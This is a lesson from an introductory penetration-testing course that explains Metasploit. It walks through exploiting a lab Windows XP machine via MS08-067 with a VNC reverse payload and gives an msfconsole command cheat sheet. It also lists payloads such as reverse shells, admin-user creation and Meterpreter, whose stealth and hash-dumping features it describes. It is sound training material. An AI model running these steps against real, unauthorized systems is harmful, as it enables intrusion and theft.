---
title: Metasploit
course: intro_pentest
section: Exploitation
layout: lesson
---

In 2004, at Defcon 12, HD Moore and spoonm rocked the world when they gave a
talk titled “Metasploit: Hacking Like in the Movies”. This presentation focused
on “exploit frameworks”. An exploit framework is formal structure for developing
and launching exploits. Frameworks assist the development process by providing
organization and guidelines for how the various pieces are assembled and
interact with each other.

Metasploit actually started out as a network game, but its full potential was
realized when it was transformed into a full-fledged exploit tool. Metasploit
contains a suite of tools including some great anti-forensics stuff; however,
the project is probably best known for the Metasploit Framework component.

Before the release of Metasploit, security researches had two main choises: they
could develop custom code by piecing together various exploits and payloads or
they could invest in one of the commercially available exploit frameworks, CORE
Impact or ImunitySec’s CANVAS. Both Impact and CANVAS were great choices and
highly successful in their own right. Unfortunately, the cost to license and use
of these products meant many security researches didn’t have access to them.

Metasploit was different from everything else because for the first time hackers
and penetration testers had access to a truly open source exploit framework.
This mean that for the first time everyone could access, collaborate, develop
and share exploits for free. It also meant that exploits could be developed in
an almost factory-like assembly line approach. The assembly line approach
allowed hackers and penetration testers to build exploits based on their own
needs.

Metasploit allows you to select the target and choose from a wide variety of
payloads. The payloads are interchangeable and not tied to a specific exploit. A
payload is the “Additional functionality” or change in behaviour that you want
to accomplish on the target machine. It’s the answer to the question: “What do I
want to do now that I have control of the machine?” Metasploit’s most popular
payloads include adding new users, opening backdoors and installing new software
onto a target machine. The full list of Metasploit payloads will be covered
shortly.

Before we begin covering the details of how to use Metasploit, it’s important to
understand the distinction between Metasploit and a vulnerability scanner. In
most instances, when we use a vulnerability scanner, the scanner will only check
to see if a system is vulnerable. This occurs in a very passive way with little
chance of any unintentional damage or disruption to the target. Metasploit and
other frameworks are exploitation tools. These tools don’t perform test; these
tools are used to complete the actual exploitation of the target. Vulnerability
scanners look for and report potential weaknesses. Metasploit attempts to
actually exploit the systems it scans. Make sure you understand this.

In 2009, Rapid 7 purchased Metasploit. HD Moore spent a considerable amount of
time putting people at ease and reassuring everyone that Metasploit would remain
free. Although several great commercial products have been released including
Metasploit Express and Metasploit Pro, HD has been true to his word and the
original Metasploit project remains free. In fact, the purchase of Metasploit by
Rapid 7 has been a huge boost to the Metasploit project. The open source project
is clearly benefitting from the commercial tool push with additional full-time
developers and staff. The rate at which new exploits and functionality is being
added is staggering. We’ll focus on the basics here, but you’ll want to stay on
top of the latest developments going forward.

Metasploit can be downloaded for free by clicking on the Framework link located
at http://www.metasploit.com. If you’re using BlackArch, Metasploit is already
installed for you. There are several ways to interact with Metasploit, but this
course will focus on using the menu-diven, non-GUI text-based system called the
Msfconsole. Once you understand the basics, the Msfconsole is fast, friendly,
intuitive and easy to use. When possible, you should avoid the Msfweb or Msfgui
versions especifically when first learaning.

We can access the Msfconsole by opening a terminal window and entering:

```
msfconsole
```

Starting the Msfconsole takes between 10 and 30 seconds, so don’t panic if
nothing happens for a few moments. Eventually Metasploit will start by
presenting you with a welcome banner and a "`msf5 >`" command prompt. There are
several different Metasploit banners that are rotated and displayed at random,
so if your screen looks different from the Metasploit screenhost posted below,
it’s normal. The important thing is that you get the "`msf5 >`" console. The
initial Metasploit screen is shown in the following image.

<img src="/img/courses/intro-pentest/msfconsole.png" class="img-fluid">

Now that Metasploit is running, let’s begin exploring the awesomeness of this
tool. To use Metasploit a target must be identified, and the exploit must be
selected, a payload needs to be picked and the exploit itself must be launched.
We’ll review the details of each of these in just a few moments but before that,
let’s review the basics of Metasploit terminology. As mentioned earlier, an
exploit is a prepackaged collection of code that gets sent to a remote system.
This code causes some atypical behaviour on the target system that allows us to
execute a payload. Recall that a payload is also a small snippet of code that is
used to perform some task like installing new software, creating new users or
opening backdoors to the system.

Exploits are weaknesses that allow the attacker to execute remote code
(payloads) on the target system. Payloads are the additional software or
functionality that we install on the target system once the exploit has been
successfully executed.

Now that we’ve an understanding of how to access and start the Msfconsole and a
solid understanding of the terminology used, let’s examine how we can use
Metasploit. When first hearing about and using Metasploit, a common mistake of
would-be hackers and penetration testers is the lack of organization and
thoughtfulness. Remember, Metasploit is like a scalpel, not a hatchet. Or maybe
more appropriately, Metasploit is like a Barret M107 sniper rifle, not a M60
machine gun. Most newcomers are overwhelmed by the sheer number of exploits and
payloads; and usually get lost trying to find appropriate exploits. They spend
their time blindly throwing every exploit against a target and hoping that
something sticks. Later in this topic, we’ll examine a tool that works in this
manner but for now we need to be a little more refined.

Rather than blindly spraying exploits to a target, we need to find a way to
match up known system vulnerabilities with the prepackaged exploits in
Metasploit. Once you’ve learned this simple process, owning a vulnerable target
becomes a cinch. To correlate a target’s vulnerabilities with Metasploit’s
exploits, we need to review our findings from the previous step. We’ll start
this process by focusing on the Nessus output. Recall that Nessus is a
vulnerability scanner and provides us with a list of known weaknesses or missing
patches. When reviewing the Nessus output, you should make notes of any findings
but pay special attention to the vulnerabilities labeled as “High”. Many “High”
Nessus vulnerabilities, especially missing Microsoft patches, correlate directly
with Metasploit exploits.

Assume that during your penetration test you uncovered a new target at IP
address 192.168.1.8. Running Nmap tells you that your new target is a Windows XP
machine with Service Pack 3 installed. Continuing on with step 2, we run Nessus
against the target, and the Nessus report returns two “High” findings.

It’s possible to drill down into each of the “High” findings to get the specific
information from Nessus. Double clicking on the first “High” finding reveals the
source of this issue is a missing patch. Specifically, Microsoft MS08-067 has
not been installed on the target machine. Clicking on the second “High”
vulnerability discovered by Nessus reveals another missing Microsoft patch. This
vulnerability is the result of missing Microsoft patch MS08-001.

At this point, we know our target has two missing patches. Both of these patches
are labeled as “High” and the descriptions that Nessus provides for both missing
patches mention “remote code execution”. As an attacker your heartbeat should be
racing a little at this point, because the chances are very good that Metasploit
will be able to exploit the target for us.

Next we need to head over to Metasploit and look for any exploits pertaining to
MS08-067 or MS09-001. Once we’ve started Metasploit, we can use the "`search`"
command to locate any exploits related to our Nessus findings. To accomplish
this, we issue the "`search`" command followed by the missing path number. For
example, at the "`msf5 >`" prompt you'd type:

```
msf5 > search ms08-067
```

Once the command is completed, make detailed notes on the findings and search
for any other missing patches. Metasploit will search through its information
  and return any relevant information it finds. The following image shows the
  output of search for MS08-067 and MS09-001 within Metasploit.

<img src="/img/courses/intro-pentest/output-ms-patches.png" class="img-fluid">

Let's review its output:

* We started by issuing the "`search`" command followed by the specific missing
  patch that Nessus discovered
* After searching, Metasploit found a matching exploit and provided us with
  several pieces of information about the exploit:
  * First, it provided us with a name and location; "`exploit/windows/smb/ms08_067_netapi`"
  * Then, Metasploit provided us with a “Rank”

It’s important to pay close attention to the exploit rank. This information
provides details about how dependable the exploit is (how often the exploit is
successful) as well as how likely the exploit is to cause instability or crashes
on the target system. Numerically, the higher an exploit is ranked, the more
likely it’s to succeed and the less likely it’s to cause disruptions on the
target system. Metasploit uses seven ratins to rank each exploit.

1. Manual
2. Low
3. Average
4. Normal
5. Good
6. Great
7. Excellent

The metasploit “search” feature can also be used to locate non-Microsoft
exploits. Nessus reports will often include a CVE or BID number to reference
critical vulnerabilities. If you’re unable to locate a missing MS path or you’re
conducting a penetration test against a non-Microsoft product, be sure to search
for matching exploits by CVE or BID numbers! Look for these in your Nessus scan
  report.

You can find more information and a formal definition of the ranking methodology
on the Metasploit.com website. Finally, the Metasploit search feature presents
us with a brief description of the exploit providing us with additional details
about the attack. When all other things are held equal, you should choose
exploits with a higher rank, as they’re less likely to disrupt the normal
functioning of your target.

Now that you understand how to match up vulnerabilities in Nessus with exploits
in Metasploit and you’ve the ability to choose between two or more Metasploit
exploits, we’re ready to unleash the full power of Metasploit on our target.

Continuing with our example, we’ll use the MS08-067 because it has a higher
ranking. To run Metasploit, we need to provide the framework with a series of
commands. Because Metasploit is already running and we’ve already found our
exploit we continue by issuing the "`use`" command in the "`msf5 >`" terminal to
set the desired exploit.

```
msf> use exploit/windows/smb/ms08_067_netapi
```

This command tells Metasploit to use the exploit that Nessus identified. Once
we’ve the exploit loaded, we need to view the available payloads. This is
accomplished by entering the "`show payloads`" in the “`msf5 >`” terminal.

There are many, many payloads to choose from. A full examination of the
different payloads is outside the scope of this course. There a Beginners to
Advanced Metasploit course. For this example, we’ll install VNC on the target
machine and then have that machine connect back to us. If you’re unfamiliar with
VNC, it’s remote control PC software that allows a user to connect to a remote
machine, review the remote machine and control the mouse and keyboard as if you
were physically sitting at that machine. It works much the same as Remote
Desktop or a Terminal Server.

It’s important to note that the VNC software ain’t currently installed on the
target machine. Remember that some exploits give us the ability to install
software on our target machine. In this example, we’re sending an exploit to our
target machine. If successfully connected, the exploit will call the "`install
vnc`" payload and remotely install the software on the victim machine without
any user interaction.

Different payloads will require different additional options to be set. If you
fail to set the required options for a given payload, your exploit will fail.
There are few things worse than getting this far and failing to set an option.
Be sure to watch this step closely. To view the available options, issue the "`show options`"
in the "`msf5 >`" terminal:

```
msf> show options
```

After issuing the show options command, we are presented with a series of
choices that are specific to the payload we’ve chosen. When using the
"`windows/vncinject/reverse_tcp`" payload, we see that there are two options
that need to be set because they’re missing any default information. The first
is "`RHOST`" and the second is "`LHOST`". RHOST is the IP address of the remote
host and LHOST is the IP address you’re attacking from. To set these options, we
issue the "`set option_name`" command in the "`msf5 >`" terminal:

```
msf> set RHOST 192.168.1.8
msf> set LHOST 192.168.1.5
```

Now that you’ve required options set, it’s usually a good idea at this point to
reissue the "`show options`" command to ensure you’re not missing any
information.

```
msf5 > show options
```

Once you’re sure you’ve entered all the information correctly, you’re ready to
launch your exploit. To send your exploit to the target machine, simply type "`exploit`"
into the "`msf5 >`" terminal:

```
msf5> exploit
```

Now sit back and watch as the magic happens. To truly appreciate the beauty and
complexity of what’s going on here, you need to build your understanding of
buffer overflows and exploitation. This is something that is highly encouraged
when you finish the basics covered in this course. Metasploit gives you the
ability to stand on the shoulders of giants and the power to launch incredibly
complex attacks with just a few commands. You should revel in the moment and
enjoy the victory of conquering your target, but you should also commit yourself
to learning even more. Commit yourself to really understanding exploitation.

After typing "`exploit`" Metasploit will go off and its thing, sending exploits
and payloads to the target. If you set up everything correctly, after a few
seconds you’ll be presented with a screen belonging to your victim machine.
Because our payload in this example was a VNC install, you’ll have the ability
to view and interacti with the target machine as if you were physically sitting
in front of it. It’s hard not to be impressed and even a little bewildered the
first time you see (or complete) this exploit in real time.

Below you’ll find a cheat sheet of the steps required to run Metasploit against
a target machine.

* Start Metasploit:
  * Open a terminal and issue the following command:
    ```msfconsole```
  * Issue the "`search`" command to search for exploits:
    ````msf5 > search missing_path_number````
  * Issue the "`use`" command to select the desired exploit:
    ```msf5 > use exploit_name_and_path_as_shown_before```
  * Issue the "`show payloads`" command to show available payloads:
    ```msf5 > show payloads```
  * Issue the "`set`" command to select payload
    ```msf5 > set payload path_to_payload_as_shown_before```
  * Issue "`show options`" to view any options needing to be filled out before
    exploiting the target
    ```msf5 > show options```
  * Issue the "`set`" command for any options listed in the previous step
    ```msf5 > set option_name desired_option_value```
  * Issue "`exploit`" to launch exploit against our target
    ```msf5 > exploit```

Now that you’ve a basic understanding of how to use Metasploit, it’s important
to review a few more of the basic payloads available to you. Although the VNC
inject is incredibly cool and great for impressing friends, relatives and
coworkers, it’s rearely used in an actual PT. In most penetration testes,
hackers prefer a simple shell allowing remote access and control of the target
machine. The following is a list of some basic payloads. Please refer to the
Metasploit documentation for a complete list. Remember, one of the powers of
Metasploit is the ability to mix and match exploits and payloads. This provides
a penetration tester with an incredible amount of flexibility, allowing the
functionality of metasploit to change depending on the desired outcome. It’s
important that you become familiar with the various payloads available to you.

<table class="table">

<thead>
  <tr>
    <th>Metasploit payload</th>
    <th>Payload description</th>
  </tr>
</thead>

<tbody>

  <tr>
    <td>windows/adduser</td>
    <td>Create a new user in the local administrator group on the target machine</td>
  </tr>
  <tr>
    <td>windows/exec</td>
    <td>Execute a Windows binary (.exe) on the target machine</td>
  </tr>
  <tr>
    <td>windows/shell_bind_tcp</td>
    <td>Open a command shell on the target machine and wait for a connection</td>
  </tr>
  <tr>
    <td>windows/shell_reverse_tcp</td>
    <td>Target machine connects back to the attacker and opens a command shell (on the target)</td>
  </tr>
  <tr>
    <td>windows/meterpreter/bind_tcp</td>
    <td>Target machine install the Meterpreter and waits for a connection</td>
  </tr>
  <tr>
    <td>windows/meterpreter/reverse_tcp</td>
    <td>Installs Meterpreter on the target machine then creates a connection back to the attacker</td>
  </tr>
  <tr>
    <td>windows/vncinject/bind_tcp</td>
    <td>Installs VNC on the target machine and waits for a connection</td>
  </tr>
  <tr>
    <td>windows/vncinject/reverse_tcp</td>
    <td>Installs VNC on the target machine and sends VNC connection back to the target</td>
  </tr>

</tbody>

</table>

Many of these same payloads exist for Linux, BSD, OSX and other operating
systems. Again, you can find the fully details by reviewing the Metasploit
documentation closely. One source of confusion for many people is the difference
between similar payloads like "`windows/meterpreter/bind_tcp`" and
"`windows/meterpreter/reverse_tcp`". The keyword that causes the confusion here
is "`reverse`". There’s a simple yet important difference between the two
payloads and knowing when to use each will often mean the difference between an
exploit’s success or failure. The key difference between these attacks is the
direction of the connection after the exploit has been delivered.

In a "`bind`" payload, we’re both sending the exploit and making a connection to
the target from the attacking machine. In this instance, the attacker sends an
exploit to the target and the target waits pasively for a connection to come in.
After sending the exploit, the attacker’s machine connects to the target.

In a "`reverse`" payload, the attacking machine sends the exploit but forces the
target machine to connect back to the attacker. In this type of attack, rather
than passively waiting for an incoming connection on a specified port or
service, the target machine actively makes a connection back to the attacker.
The next image should make this concept clearer.

![](/img/courses/intro-pentest/bind_reverse_difference.png)

The last Metasploit topic to discuss is the Meterpreter. The Meterpreter is a
powerful and flexible tool that you’ll need to learn to control if you’re going
to master the art of Metasploit. The Meta-Interpreter, or Meterpreter is a
payload in Metasploit that gives attackers a powerful command shell that can be
used to interact with their target.

Another big advantage of the Meterpreter is the fact that it runs entirely in
memory and never utilizes the hard drive. This tactic provides a layer of
stealth that helps it evade many anti-virus systems and confounds some forensic
tools.

The meterpreter functions in a manner similar to Windows cmd.exe or the Linux
/bin/sh command. Once installed on the victim machine, it allows the attacker to
interact with and execute commands on the target as if the attackers were
sitting at the local machine. It’s very important to understand that the
Meterpreter wil run with the privileges associated with the program that was
exploited. For example, assume that our favourite Network Admin Ben Owned, was
disregarded all common sense and is running his IRC program as a "`root`" (the
Linux equivalent of the Windows “Administrator” account). Unfortunately for Ben,
his system is out-of-date, and during a recent penetration test the attacker was
able to exploit Ben’s IRC program as the root account, and because the IRC
program was exploited by Metasploit, the Meterpreter is now able to function
with all the privileges and rights of the "`root`" account! This is one example
in a long list of reasons why it’s important to run all your program with the
most restrictive privileges possible and avoid running anything as root or
administrator.

Another reason for using the Meterpreter over a traditional cmd or Linux shell
stems from the fact that starting either of these on a target machine often
starts a new process that can be detected by a keen user or wily administrator.
This means that the attacker raises his or her visibility and chances of
detection while interacting with the target machine. Furthermore, both the
cmd.exec and /bin/sh provide a limited number of tools that can be accessed. In
contrast, the Meterpreter was built from the ground up to be used as sort of
“hacker’s cmd” with the ability to access and control the most popular tools and
functions needed during a penetration test.

The Meterpreter has many great features that are built in by default. Basic
functions include the “migrate” command, which is useful for moving the server
to another process. Migrating the Meterpreter server to another process is
important in case the vulnerable service you attacked is shut down or stopped.
Another useful function is the “cat” command, which can be used to display local
file contents on the screen. This is useful for reviewing various files on the
target. The “download” command allows you to pull a file or directory from the
target machine, making a local copy on the attacker’s machine. The “upload”
command can be used to move files from the attacker’s machine to the target
machine. The “edit” command can be used to make changhes to simple files. The
“execute” command can be used to issue a command and have it run on the remote
machine, whereas “kill” can be used to stop a process. The following commands
are also useful and provide the exact same function as they do on a normal Linux
machine: “cd”, “ls”, “ps”, “shutdown”, “mkdir”, “pwd” and “ifconfig”.

Some of the most advanced features include the ability to extract password hases
through the SAM Juicer tool, the ability to interact with a ruby shell, the
ability to load and execute arbitrary DLLs on the target and even the ability to
lock out the local keyboard and mouse.

As you can see, gaining access to a Meterpreter shell is one of the most
powerful, flexible and stealthy ways that an attacker can interact with a
target. It’s well worth your time to learn how to use this handy tool.
